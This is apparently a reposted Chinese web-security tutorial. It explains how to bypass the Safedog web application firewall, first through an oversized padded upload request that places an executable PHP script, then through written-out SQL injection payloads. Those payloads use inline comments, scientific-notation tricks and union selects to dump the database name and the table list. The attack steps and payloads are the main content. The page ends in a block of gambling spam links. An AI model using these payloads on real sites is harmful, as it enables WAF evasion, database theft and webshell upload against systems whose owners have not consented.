安基网 首页 安全 渗透测试 查看内容

数据库注入技术,黑客大牛教你如何绕过安全狗

2020-3-13 17:01| 投稿: |来自:


免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

摘要: 推荐网站: 国内长度最短的XSS平台,支持https协议一,绕过安全狗上传可执行脚本附上php上传脚本源码,此源码未对上传文件类型做校验 -------------绕过方法,工具:burpsuite1,用 php脚本或者js,python等其他语言,生成48930个字符2,抓包,改包3,添加后如图:4,查看当前目录,上传成功1二,sql注入 ...


推荐网站: 国内长度最短的XSS平台,支持https协议

一,绕过安全狗上传可执行脚本附上php上传脚本源码,此源码未对上传文件类型做校验

-------------

绕过方法,工具:burpsuite1,用 php脚本或者js,python等其他语言,生成48930个字符2,抓包,改包

3,添加后如图:

4,查看当前目录,上传成功1

二,sql注入绕过安全狗1,测试文件,明显的字符型 SQL注入-----------------------------
'; $res = mysql_query($sql); while ( $rows = mysql_fetch_array($res)) { echo $rows[0]; echo $rows[1]; echo $rows[2]; }?>2,正常运行界面

3,添加注入测试语句http://localhost/waf123。php?id=3' and 1=1 --+

4,修改测试语句http://localhost/waf123。php?id=3'/*!and*/%202e1/**/=2e1--+

5,暴库http://localhost/waf123。php?id=2e1'/*!and*/ 2e1/**/=2e1union(/*。1112*//**//*!*/(select@1/**/,2,database/**/(),4,5))--+

6,爆表http://localhost/waf123.php?id=2e1'/*!and*/ 2e1/**/=2e1union(/*.1112*//**//*!*/(select@1/**/,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=0x74657374))--+

上述内容不知道大家学习到了吗?网络世界的安全漏洞每天都会出现,安全知识和安全意识每个公民都应该了解和学习,有想学习网络安全技能的小伙伴可以随时私信我哦!



小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!

本文出自:https://www.toutiao.com/a6803204449503281668/

免责声明:本站系公益性非盈利IT技术普及网,本文由投稿者转载自互联网的公开文章,文末均已注明出处,其内容和图片版权归原网站或作者所有,文中所述不代表本站观点,若有无意侵权或转载不当之处请从网站右下角联系我们处理,谢谢合作!

相关阅读

最新评论

 最新
返回顶部
青海快3走势 赢天下彩票计划群 上海快3走势图 J8彩票计划群 幸运28彩票计划群 云鼎彩票计划群 极速赛车登陆 王者彩票APP 金巴黎彩票计划群 福星彩票计划群